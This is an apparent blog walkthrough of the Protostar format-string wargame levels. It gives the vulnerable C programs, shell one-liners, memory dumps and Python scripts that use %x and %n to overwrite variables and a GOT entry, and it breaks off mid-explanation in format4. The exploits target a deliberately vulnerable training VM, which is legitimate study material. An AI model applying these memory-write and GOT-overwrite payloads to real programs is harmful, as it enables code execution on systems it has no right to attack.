INTRO TO PWN: PROTOSTAR FORMAT STRINGS

Nithilan Pugal
ZH3R0
Published in
18 min readMay 14, 2020

Format string vulnerabilities are extremely interesting vulnerabilities by itself. Well then how do they work??

printf(const char *format, ...);

As you can see printf takes in a format character and then an input, the format character can dictate what type of input is taken like if it is a string or a hex, etc.

We can supply the format string with %x to leak out the memory of the stack too when stack protections such as ASLR or Stack canary are used.

If you look at the man page for printf — man 3 printf — you will see various format characters such as %d for decimal numbers, %x for hexadecimal, %s for strings, etc. When they are input into the 1st part of printf, it will read the stack as input in the format character which you specify.

FORMAT0:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void vuln(char *string)
{
volatile int target;
char buffer[64];

target = 0;

sprintf(buffer, string);

if(target == 0xdeadbeef) {
printf("you have hit the target correctly :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

As we look at this code we can immediately spot the vulnerability which is the sprintf, sprintf acts like gets and copies everything from string into the buffer. So all we have to do is overflow the buffer and overwrite target as 0xdeadbeef.

user@prototar:/opt/prototar/bin$ ./format0 "`python -c "print 'A'*64 + '\xef\xbe\xad\xde'"`"
you have hit the target correctly :)

We got Format0, and that was really easy!!! Now let us go to the next one.

FORMAT1:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
printf(string);

if(target) {
printf("you have modified the target :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

As you can see here, our input is placed in the first part of of printf where the format string goes. Now lets type %x and see what happens.

user@protostar:/opt/protostar/bin$ ./format1 "%x %x %x %x %x %x"
804960c bffff7d8 8048469 b7fd8304 b7fd7ff4 bffff7d8user@protostar:/opt/protostar/bin$

As you can see we are printing things on the stack. If we keep increasing the number of %x we will keep printing things on the stack.

Now let us find the address of target:

user@protostar:/opt/protostar/bin$ objdump -t format1format1:  file format elf32-i386SYMBOL TABLE:
08048114 l d .interp 00000000 .interp
08048128 l d .note.ABI-tag 00000000 .note.ABI-tag
08048148 l d .note.gnu.build-id 00000000 .note.gnu.build-id
0804816c l d .hash 00000000 .hash
08048198 l d .gnu.hash 00000000 .gnu.hash
080481b8 l d .dynsym 00000000 .dynsym
08048218 l d .dynstr 00000000 .dynstr
0804826a l d .gnu.version 00000000 .gnu.version
08048278 l d .gnu.version_r 00000000 .gnu.version_r
08048298 l d .rel.dyn 00000000 .rel.dyn
080482a0 l d .rel.plt 00000000 .rel.plt
080482c0 l d .init 00000000 .init
080482f0 l d .plt 00000000 .plt
08048340 l d .text 00000000 .text
080484dc l d .fini 00000000 .fini
080484f8 l d .rodata 00000000 .rodata
08048520 l d .eh_frame 00000000 .eh_frame
08049524 l d .ctors 00000000 .ctors
0804952c l d .dtors 00000000 .dtors
08049534 l d .jcr 00000000 .jcr
08049538 l d .dynamic 00000000 .dynamic
08049608 l d .got 00000000 .got
0804960c l d .got.plt 00000000 .got.plt
08049628 l d .data 00000000 .data
08049630 l d .bss 00000000 .bss
00000000 l d .stab 00000000 .stab
00000000 l d .stabstr 00000000 .stabstr
00000000 l d .comment 00000000 .comment
00000000 l df *ABS* 00000000 crtstuff.c
08049524 l O .ctors 00000000 __CTOR_LIST__
0804952c l O .dtors 00000000 __DTOR_LIST__
08049534 l O .jcr 00000000 __JCR_LIST__
08048370 l F .text 00000000 __do_global_dtors_aux
08049630 l O .bss 00000001 completed.5982
08049634 l O .bss 00000004 dtor_idx.5984
080483d0 l F .text 00000000 frame_dummy
00000000 l df *ABS* 00000000 crtstuff.c
08049528 l O .ctors 00000000 __CTOR_END__
08048520 l O .eh_frame 00000000 __FRAME_END__
08049534 l O .jcr 00000000 __JCR_END__
080484b0 l F .text 00000000 __do_global_ctors_aux
00000000 l df *ABS* 00000000 format1.c
0804960c l O .got.plt 00000000 .hidden _GLOBAL_OFFSET_TABLE_
08049524 l .ctors 00000000 .hidden __init_array_end
08049524 l .ctors 00000000 .hidden __init_array_start
08049538 l O .dynamic 00000000 .hidden _DYNAMIC
08049628 w .data 00000000 data_start
08048440 g F .text 00000005 __libc_csu_fini
08048340 g F .text 00000000 _start
00000000 w *UND* 00000000 __gmon_start__
00000000 w *UND* 00000000 _Jv_RegisterClasses
080484f8 g O .rodata 00000004 _fp_hw
080484dc g F .fini 00000000 _fini
00000000 F *UND* 00000000 __libc_start_main@@GLIBC_2.0
080484fc g O .rodata 00000004 _IO_stdin_used
08049628 g .data 00000000 __data_start
0804962c g O .data 00000000 .hidden __dso_handle
08049530 g O .dtors 00000000 .hidden __DTOR_END__
08048450 g F .text 0000005a __libc_csu_init
00000000 F *UND* 00000000 printf@@GLIBC_2.0
08049630 g *ABS* 00000000 __bss_start
080483f4 g F .text 00000028 vuln
08049638 g O .bss 00000004 target
0804963c g *ABS* 00000000 _end
00000000 F *UND* 00000000 puts@@GLIBC_2.0
08049630 g *ABS* 00000000 _edata
080484aa g F .text 00000000 .hidden __i686.get_pc_thunk.bx
0804841c g F .text 0000001b main
080482c0 g F .init 00000000 _init

As we can see the address of the target variable is 0x08049638.

Now how does a variable work?? How do we write to target??

We use a format string called %n which writes the amount of characters printed into a variable, thus it writes to memory. Variables have a pointer — variable pointer — which points to a place on the stack where the variable is stored, in assembly the address of the variable which we found via objdump is placed on the stack.

Now lets print the stack to see if we can find it:

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print '%x '*200"`"
804960c bffff588 8048469 b7fd8304 b7fd7ff4 bffff588 8048435 bffff758 b7ff1040 804845b b7fd7ff4 8048450 0 bffff608 b7eadc76 2 bffff634 bffff640 b7fe1848 bffff5f0 ffffffff b7ffeff4 804824d 1 bffff5f0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff608 204c744f a1f225f 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff634 8048450 8048440 b7ff1040 bffff62c b7fff8f8 2 bffff74e bffff758 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff72b 1f bffffff2 f bffff73b 0 0 0 3a000000 aaeedef9 3e986fd3 66b1abf0 697ff661 363836 0 0 0 2f2e0000 6d726f

Hmmmm why is there a repetition of numbers?? Lets decode the hex values:

If we decode the hex values to ascii it would show: %x %x %x, we have reached the stack where the variables are stored.

What we can do is we can place the address of target and then write to it using %n, so lets pad our input such that it is easier to find.

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08' +'BBBB'+'%x '*200"`"
AAAA8BBBB804960c bffff588 8048469 b7fd8304 b7fd7ff4 bffff588 8048435 bffff74c b7ff1040 804845b b7fd7ff4 8048450 0 bffff608 b7eadc76 2 bffff634 bffff640 b7fe1848 bffff5f0 ffffffff b7ffeff4 804824d 1 bffff5f0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff608 5237e6b9 7864b0a9 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff634 8048450 8048440 b7ff1040 bffff62c b7fff8f8 2 bffff742 bffff74c 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff72b 1f bffffff2 f bffff73b 0 0 0 ab000000 63f594da 3de356ee 69bf3870 697c9722 363836 2f2e0000 6d726f

There we can see our address now we have to get to it such that we can write to it using %n

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08' +'BBBB'+'%x '*140"`"
AAAA8BBBB804960c bffff638 8048469 b7fd8304 b7fd7ff4 bffff638 8048435 bffff800 b7ff1040 804845b b7fd7ff4 8048450 0 bffff6b8 b7eadc76 2 bffff6e4 bffff6f0 b7fe1848 bffff6a0 ffffffff b7ffeff4 804824d 1 bffff6a0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6b8 87be168e adeae09e 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff6e4 8048450 8048440 b7ff1040 bffff6dc b7fff8f8 2 bffff7f6 bffff800 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7db 1f bffffff2 f bffff7eb 0 0 0 71000000 4b837673 33f8bc29 c8503f44 69727d41 363836 0 2f2e0000 6d726f66 317461 41414141 8049638 42424242 25207825 78252078 20782520 25207825 78252078 20782520 25207825 78252078 20782520 25207825

We are getting closer

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08' +'BBBB'+'%x '*130"`"
AAAA8BBBB804960c bffff658 8048469 b7fd8304 b7fd7ff4 bffff658 8048435 bffff81e b7ff1040 804845b b7fd7ff4 8048450 0 bffff6d8 b7eadc76 2 bffff704 bffff710 b7fe1848 bffff6c0 ffffffff b7ffeff4 804824d 1 bffff6c0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6d8 b9c4d785 93906195 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff704 8048450 8048440 b7ff1040 bffff6fc b7fff8f8 2 bffff814 bffff81e 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7fb 1f bffffff2 f bffff80b 0 0 0 67000000 b5c5f25 697d2314 ce2ab275 69ecff4b 363836 0 6f662f2e 74616d72 41410031 96384141 42420804 78254242

Now we just keep fiddling around with the stack such that the address becomes aligned:

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BBBBB'+'%x '*128+'%x '"`"
AAAA8BBBBB804960c bffff658 8048469 b7fd8304 b7fd7ff4 bffff658 8048435 bffff820 b7ff1040 804845b b7fd7ff4 8048450 0 bffff6d8 b7eadc76 2 bffff704 bffff710 b7fe1848 bffff6c0 ffffffff b7ffeff4 804824d 1 bffff6c0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6d8 a191ad2 204dacc2 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff704 8048450 8048440 b7ff1040 bffff6fc b7fff8f8 2 bffff816 bffff820 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7fb 1f bffffff2 f bffff80b 0 0 0 a8000000 ed37b423 7dd6fafa 260e960b 6915d863 363836 0 2f2e0000 6d726f66 317461 41414141 8049638

As you can see that my lat %x references the address of the target variable, so now if we replace the last %x with %n it will write the printf input to the target variable using the address we have provided:

user@protostar:/opt/protostar/bin$ ./format1 "`python -c "print 'AAAA'+'\x38\x96\x04\x08'+'BBBBB'+'%x '*128+'%n '"`"
AAAA8BBBBB804960c bffff658 8048469 b7fd8304 b7fd7ff4 bffff658 8048435 bffff820 b7ff1040 804845b b7fd7ff4 8048450 0 bffff6d8 b7eadc76 2 bffff704 bffff710 b7fe1848 bffff6c0 ffffffff b7ffeff4 804824d 1 bffff6c0 b7ff0626 b7fffab0 b7fe1b28 b7fd7ff4 0 0 bffff6d8 e4a5d3d 241eeb2d 0 0 0 2 8048340 0 b7ff6210 b7eadb9b b7ffeff4 2 8048340 0 8048361 804841c 2 bffff704 8048450 8048440 b7ff1040 bffff6fc b7fff8f8 2 bffff816 bffff820 0 bffff9b1 bffff9bf bffff9d3 bffff9f4 bffffa07 bffffa11 bfffff01 bfffff3f bfffff53 bfffff6a bfffff7b bfffff83 bfffff93 bfffffa0 bfffffd4 bfffffe6 0 20 b7fe2414 21 b7fe2000 10 178bfbbf 6 1000 11 64 3 8048034 4 20 5 7 7 b7fe3000 8 0 9 8048340 b 3e9 c 0 d 3e9 e 3e9 17 1 19 bffff7fb 1f bffffff2 f bffff80b 0 0 0 42000000 4eddec35 f02178d3 5cec85b3 69568ffe 363836 0 2f2e0000 6d726f66 317461 41414141 you have modified the target :)

YESSSSS! We have now modified the variable!!!

FORMAT2:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);
printf(buffer);

if(target == 64) {
printf("you have modified the target :)\n");
} else {
printf("target is %d :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

Now lets take a look at this. We can see that we have a buffer and then the int target above. Use objdump -t to find target.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA'+'\xe4\x96\x04\x08'+'%x '*10" | ./format2  
AAAA�200 b7fd8420 bffff614 41414141 80496e4 25207825 78252078 20782520 25207825 78252078
target is 0 :(

lets aim for it and see what happens

user@protostar:/opt/protostar/bin$ python -c "print 'AAAA'+'\xe4\x96\x04\x08'+'%x '*4+'%n '" | ./format2 
AAAA�200 b7fd8420 bffff614 41414141
target is 39 :(

Ok we got 39. Now %n writes the amount of character we have already printed into the variable, so thus this means we have printed only 39 variables, thus we need to print 64 variable such that when %n is used it will stored 64 into the target variable.

user@protostar:/opt/protostar/bin$ python -c "print 'AAAAAAAAAAA0'+'\xe4\x96\x04\x08'+'%x'*6+'aaaaa%n'" | ./format2
AAAAAAAAAAA0�200b7fd8420bffff614414141414141414130414141aaaaa
you have modified the target :)

After a bit of work we hit the target!!!!!!! All this takes is a bit if intuition and trial and error.

FORMAT3:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
printf(string);
}

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);

printbuffer(buffer);

if(target == 0x01025544) {
printf("you have modified the target :)\n");
} else {
printf("target is %08x :(\n", target);
}
}

int main(int argc, char **argv)
{
vuln();
}

Ok so now it looks like that the input we give in must be of value 0x01025544.

OH SNAP!!! Well we better get started:

First use objdump -t to find the address of target which is 0x080496f4. So if we play around you may get something like this:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%08x '*11+'%08x'" | ./format3
�00000000 bffff5d0 b7fd7ff4 00000000 00000000 bffff7d8 0804849d bffff5d0 00000200 b7fd8420 bffff614 080496f4
target is 00000000 :(

Ok we are getting there. So the %08x denotes fill the spaces all with 0s such that it is 8 bytes, this acts as our padding.

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%x '*11+'%08x'" | ./format3
�0 bffff5d0 b7fd7ff4 0 0 bffff7d8 804849d bffff5d0 200 b7fd8420 bffff614 080496f4
target is 00000000 :(

So we can fiddle around with this:

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%0757x '*11+'%08n'" | ./format3
...
...
target is 00002096 :)

Okay we are getting there

user@protostar:/opt/protostar/bin$ python -c "print '\xf4\x96\x04\x08'+'%01539100x '*11+'%08n'" | ./format3
...
...
target is 01025543 :)

Well one more to go!!

user@protostar:/opt/protostar/bin$ python -c “print ‘\xf4\x96\x04\x08’+’%01539100x ‘*11+’a%08n’” | ./format3
...
...
you have modified the target :)

YES!!!!!! We got it!!! IF you are wondering what would happen if I took out the 0 from %08x, instead of padding it with 0 it would instead be spaces.

FORMAT4:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);

printf(buffer);

exit(1);
}

int main(int argc, char **argv)
{
vuln();
}

There is no ‘target’ we also cannot return to the function ‘hello’ because before we get to ret the program immediately exits. So how do we do it?!?!?

WE OVERWRITE THE GOT!!!

Many of you are talking gasps of air as you have no idea what this is but it sounds AWESOME!!! Now time to break your overbearing imagination:

~FORMAT 4 to be continued……

GOT & PLT:

Now lets first write a simple C program:

#include <stdio.h>int main() {
puts("Hello world");
puts("c00p4rklynn is my secret name");
exit(0);
return 0;
}

And we compile with gcc:

$ gcc random.c -o random

My C file uses 2 functions which I have not defined and wrote a code for — puts and exit. Then how are they used??? These functions are in a libc library which is a file which contains the functions which are defined and have their code written already. Thus what gcc does is dynamically link the random binary to the libc library thus when the binary uses a function like puts and exit it is called from the libc library and used. Lets now analyze this in gdb:

gdb random(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x10
0x080483fd <main+9>: mov DWORD PTR [esp],0x80484f0
0x08048404 <main+16>: call 0x804831c <puts@plt>
0x08048409 <main+21>: mov DWORD PTR [esp],0x80484fc
0x08048410 <main+28>: call 0x804831c <puts@plt>
0x08048415 <main+33>: mov DWORD PTR [esp],0x0
0x0804841c <main+40>: call 0x804832c <exit@plt>
End of assembler dump.

We can see that the puts is called at the address 0x804831c, lets disassemble that address and take a look at it:

(gdb) disassemble 0x804831c
Dump of assembler code for function puts@plt:
0x0804831c <puts@plt+0>: jmp DWORD PTR ds:0x804961c
0x08048322 <puts@plt+6>: push 0x10
0x08048327 <puts@plt+11>: jmp 0x80482ec
End of assembler dump.

WHAT?!?! We are jumping to an address?!?! Lets disassemble that address too.

Dump of assembler code for function _GLOBAL_OFFSET_TABLE_:
0x08049608 <_GLOBAL_OFFSET_TABLE_+0>: xor al,0x95
0x0804960a <_GLOBAL_OFFSET_TABLE_+2>: add al,0x8
0x0804960c <_GLOBAL_OFFSET_TABLE_+4>: add BYTE PTR [eax],al
0x0804960e <_GLOBAL_OFFSET_TABLE_+6>: add BYTE PTR [eax],al
0x08049610 <_GLOBAL_OFFSET_TABLE_+8>: add BYTE PTR [eax],al
0x08049612 <_GLOBAL_OFFSET_TABLE_+10>: add BYTE PTR [eax],al
0x08049614 <_GLOBAL_OFFSET_TABLE_+12>: add al,BYTE PTR [ebx-0x7cedf7fc]
0x0804961a <_GLOBAL_OFFSET_TABLE_+18>: add al,0x8
0x0804961c <_GLOBAL_OFFSET_TABLE_+20>: and al,BYTE PTR [ebx-0x7ccdf7fc]
0x08049622 <_GLOBAL_OFFSET_TABLE_+26>: add al,0x8
End of assembler dump.

GOT?!?! Lets examine the memory:

x 0x804961c
0x804961c <_GLOBAL_OFFSET_TABLE_+20>: "\"\203\004\b2\203\004\b"

Ohh so it seems to be redirecting this code out of this binary to an external library.

So what we saw here was that the function was first called and went to a jump section which was the PLT — Process Linkage Table — and then jumped to the GOT — Global Offset Table — which contained the address to an external function which was out of the binary — in this case the address of puts in the libc library.

When compiling a binary we do not know where the address of exit or puts is in libc. When we execute the binary, we call a location where we know it will be, which is the PLT section, it contains a jump to the GOT, where the GOT is a table or a reference list containing the address to where each function is in libc/other dynamically linked libraries.

To be able to use external functions from a library, we need to write the real address of the function on to the GOT.

Everyone knows about ELF binary format, it is not normal Assembly code, what it first does before execution of main is that it loads and executes pre-processes like linking the PLT and GOT with the addresses and etc.

You can exploit this by overwriting the GOT such that instead of the address for an external function, it can call another function of your choice. Also the GOT table is always constant even if libc’s address may change thus you can calculate offsets of various other functions of libc from the address you already have allowing to exploit the binary via ROP or Ret2Libc.

Now that you have a good understanding of what we are going to do, lets head back…

FORMAT 4 …. The Conclusion…

Now that we have an understanding of what we are about to do lets get started.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
printf("code execution redirected! you win\n");
_exit(1);
}

void vuln()
{
char buffer[512];

fgets(buffer, sizeof(buffer), stdin);

printf(buffer);

exit(1);
}

int main(int argc, char **argv)
{
vuln();
}

Open a second protostar tab in /tmp, this will make writing scripts easier. So lets find the address of exit and the address of hello.

(gdb) disassemble vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) disassemble 0x80483ec
Dump of assembler code for function exit@plt:
0x080483ec <exit@plt+0>: jmp DWORD PTR ds:0x8049724
0x080483f2 <exit@plt+6>: push 0x30
0x080483f7 <exit@plt+11>: jmp 0x804837c
End of assembler dump.
(gdb) x 0x8049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2

The address of exit is 0x08049724 and now hello is:

(gdb) x hello
0x80484b4 <hello>: 0x83e58955

The address of hello is 0x80484b4. Now lets start writing a script

import struct
HELLO = 0x80484b4
EXIT = 0x08049724
#Define a function to pad the input to 512 bytes due to the bufferdef padding(s):
return s+('X'*(512-len(s)))
exploit = "" #Make sure it is empty
exploit += "AAAABBBBCCCC" #find how far we are from input
exploit += "%x "*10
print padding(exploit)

Now lets execute it:

user@protostar:/opt/protostar/bin$ python /tmp/exp.py | ./format4
AAAABBBBCCCC200 b7fd8420 bffff614 41414141 42424242 43434343 25207825 78252078 20782520 25207825 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

So after 4 bytes is the offset where the input starts in the stack. We can use the percentage and dollar notation to specify and refrence this offset to the printf function.

import struct
HELLO = 0x80484b4
EXIT = 0x08049724
#Define a function to pad the input to 512 bytes due to the bufferdef padding(s):
return s+('X'*(512-len(s)))
exploit = "" #Make sure it is empty
exploit += struct.pack("I", EXIT)
exploit += "AAAABBBBCCCC" #find how far we are from input
exploit += "%4$x "
exploit += "%4$n"
print padding(exploit)

The %4 means the 4th byte or where 0x41414141 was located which is now replaced by the address of exit, we will now see if we can overwrite the GOT.

Lets open the program in gdb and disassemble vuln:

(gdb) disassemble vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.

Now lets set breakpoints before and after printf so we can see if the GOT changes.

End of assembler dump.
(gdb) b*0x08048503
Breakpoint 1 at 0x8048503: file format4/format4.c, line 20.
(gdb) b*0x08048508
Breakpoint 2 at 0x8048508: file format4/format4.c, line 22.

Now run and arrive at the first breakpoint:

(gdb) r
Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x00000018

YESSSS!!! We have overwritten the GOT with a value. Now we have to get the right value. So we are aiming for 0x80484b4 so about 134 million characters should do it. No biggie!!!

If we did something like that, it would make the stack explode, we can take advantage of another printf internal function which is padding, as we did in format 3 we can give numbers before the “x” and thus is padded with that many number of bytes.

But if we pad with that many number of bytes, the printing process will be extremely long so what we will do is split it into 2 printing processes:

Our address is 0x080484b4 so our first printing process will aim for the last 2 bytes which is 84b4 and our second process will aim for 0804:

The first process:

import struct
HELLO = 0x80484b4
EXIT = 0x08049724
#Define a function to pad the input to 512 bytes due to the bufferdef padding(s):
return s+('X'*(512-len(s)))
exploit = "" #Make sure it is empty
exploit += struct.pack("I", EXIT)
exploit += "AAAABBBBCCCC" #find how far we are from input
exploit += "%4$30x "
exploit += "%4$n"
print padding(exploit)

Lets see first how much we overwrite, thus run it again and examine the GOT:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x0000002f

Ok so with a padding of 30 we got 0x2f which is 47 in decimal. We are aiming for hex 84b4 which is 33972, so due to padding offset lets pad our x with 33955 ->33972–19.

mport struct
HELLO = 0x80484b4
EXIT = 0x08049724
#Define a function to pad the input to 512 bytes due to the bufferdef padding(s):
return s+('X'*(512-len(s)))
exploit = "" #Make sure it is empty
exploit += struct.pack("I", EXIT)
exploit += "AAAABBBBCCCC" #find how far we are from input
exploit += "%4$33955x "
exploit += "%4$n"
print padding(exploit)

Run:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
$AAAABBBBCCCC
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x000084b4

Okay we have overwritten the lower half now lets go for the upper:

import struct
HELLO = 0x80484b4
EXIT = 0x08049724
#Define a function to pad the input to 512 bytes due to the bufferdef padding(s):
return s+('X'*(512-len(s)))
exploit = "" #Make sure it is empty
exploit += struct.pack("I", EXIT)
exploit += struct.pack("I", EXIT+2)
exploit += "BBBBCCCC" #find how far we are from input
exploit += "%4$33956x" #Due to the space before it was one byte
exploit += "%4$n" #I have deleted the space and added 1 to the
exploit += "%5$30x" # padding
exploit += "%5$n"
print padding(exploit)

If you remember how stacks look like now that we have added +2 to EXIT it will now refrence the first 2 bytes there. 0x00000000, thus all we have done is moved the pointer forward enabling use to rewrite the address easily. The %5 refrences the offset of 5 bytes from the beginning. Thus %n will write at the 5th offset.

Run:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 format4/format4.c: No such file or directory.
in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
$&BBBBCCCC
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x84d284b4

We have overwritten successfully but sadly not to the correct value. But we have gone above the target!!! So how do we decrease our number when we can only add to our padding?!?!?

We overflow it such that it become 1 080484b4 because GOT will only read the four bytes on there which are 080484b4 and disregard the 1 since it is not in the 4 bytes. So we must overflow from 84d2 to 1 0804. We put that in a hex calculator and lets check:

